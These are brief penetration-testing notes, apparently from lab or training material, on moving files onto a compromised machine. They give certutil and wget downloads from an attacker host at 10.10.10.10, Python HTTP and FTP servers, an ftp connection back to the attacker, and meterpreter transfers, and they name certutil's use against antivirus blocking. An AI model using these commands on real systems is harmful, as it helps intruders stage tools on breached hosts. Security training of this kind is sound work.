There are several tools we can use to transfer files between the compromised machine and ourselves. 1. `certutil`: If the target machine is windows based we can use the `certutil` command to download files from an endpoint. eg: `certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt` 2. `HTTP`: We can host an HTTP server on our machine using python to host files to be downloaded eg: `python -m SimpleHTTPServer 80` 3. `FTP`: If we cannot use `certutil` for some reason such as being blocked by an antivirus, we can connect to a `FTP` on the attacker machine from the compromised machine. Attacker: `python -m pyftpdlib 21` Compromised: `ftp 10.10.10.10` 4. `Metasploit`: If we have a meterpreter session, we can use the `upload` and `download` commands available to transfer files. 5. `Browser`: We can also use the web browser to navigate to our server and download the file from there directly 6. `wget`: In Linux, we can use the available `wget` command to download a resource with a URL